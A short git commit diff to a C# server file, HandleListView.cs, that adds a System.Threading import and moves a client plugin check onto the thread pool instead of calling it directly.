Update HandleListView.cs
This commit is contained in:
parent
65f60c29ff
commit
82d9f3b2d3
@ -4,6 +4,7 @@ using Server.Connection;
|
||||
using cGeoIp;
|
||||
using System.Drawing;
|
||||
using System.Windows.Forms;
|
||||
using System.Threading;
|
||||
|
||||
namespace Server.Handle_Packet
|
||||
{
|
||||
@ -32,7 +33,7 @@ namespace Server.Handle_Packet
|
||||
|
||||
try
|
||||
{
|
||||
client.CheckPlugin();
|
||||
ThreadPool.QueueUserWorkItem(client.CheckPlugin);
|
||||
}
|
||||
catch { }
|
||||
|
||||
|
Loading…
x
Reference in New Issue
Block a user